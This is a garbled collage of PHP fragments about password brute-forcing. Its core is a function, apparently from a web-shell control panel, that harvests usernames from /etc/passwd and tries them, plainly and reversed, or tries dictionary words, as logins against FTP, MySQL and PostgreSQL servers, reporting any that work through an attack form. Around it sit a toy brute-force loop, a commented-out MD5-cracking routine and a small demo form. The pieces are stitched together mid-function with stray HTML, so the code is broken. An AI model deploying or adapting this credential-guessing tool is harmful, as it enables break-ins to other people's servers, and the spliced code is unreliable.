$word[$wpos] = $prelast;
}
}
*/
return $word;
}
//===CODE===
//$test = ("nazdar");
//echo ($test["2"]);
//die();
echo nextChar("d") . "\n";
echo bruteForce("ahoj") . "\n----------------------\n\n";
$ted = "a";
while (1) {
echo $ted . "\n";
$ted = bruteForce($ted);
}
/*
$hash = ("79c2b46ce2594ecbcb5b73e928345492");
$pass = ("ahoj");
//echo(md5("ahoj"));
$loop = 1;
while($loop) {
$now = $pass;
if ( md5($now) == $hash ) {
die ("Hash: $hash\nVysledek: $now\n");
}
function actionBruteforce()
{
hardHeader();
if (isset($_POST['proto'])) {
echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>';
if ($_POST['proto'] == 'ftp') {
function bruteForce($ip, $port, $login, $pass)
{
$fp = @ftp_connect($ip, $port ? $port : 21);
if (!$fp) {
return false;
}
$res = @ftp_login($fp, $login, $pass);
@ftp_close($fp);
return $res;
}
} elseif ($_POST['proto'] == 'mysql') {
function bruteForce($ip, $port, $login, $pass)
{
$res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass);
@mysql_close($res);
return $res;
}
} elseif ($_POST['proto'] == 'pgsql') {
function bruteForce($ip, $port, $login, $pass)
{
$str = "host='" . $ip . "' port='" . $port . "' user='******' password='******' dbname=postgres";
$res = @pg_connect($str);
@pg_close($res);
return $res;
}
}
$success = 0;
$attempts = 0;
$server = explode(":", $_POST['server']);
if ($_POST['type'] == 1) {
$temp = @file('/etc/passwd');
if (is_array($temp)) {
foreach ($temp as $line) {
$line = explode(":", $line);
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>';
}
if (@$_POST['reverse']) {
$tmp = "";
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
++$attempts;
if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) {
$success++;
echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp);
}
}
}
}
} elseif ($_POST['type'] == 2) {
$temp = @file($_POST['dict']);
if (is_array($temp)) {
foreach ($temp as $line) {
$line = trim($line);
++$attempts;
if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) {
$success++;
echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>';
}
}
}
}
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
}
echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<input type=hidden name=ne value="">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' . '<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' . '<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>';
echo '</div>';
hardFooter();
}
">
</fieldset>
<fieldset>
<input type="hidden" name="try" value="1">
<input type="submit" value="Find it">
</fieldset>
</form>
<p>
<?php
$count = 0;
if (isset($_POST['try'])) {
set_time_limit(5);
$check = function ($pwd) {
//print htmlentities($pwd).'<br>';
return $pwd == 'abcd';
};
$password = bruteForce($chars, $check, $max, $min, $trymax, $count);
if (false === $password) {
print 'Password not found';
} else {
printf('Password is "%s"', $password);
}
}
?>
</p>
<p style="font-size:11px;">
<?php
print (int) $count . ' tries ';
print ' took ' . sprintf("%.2f", microtime(true) - $_SERVER["REQUEST_TIME_FLOAT"]) . ' secondes';
?>
</p>
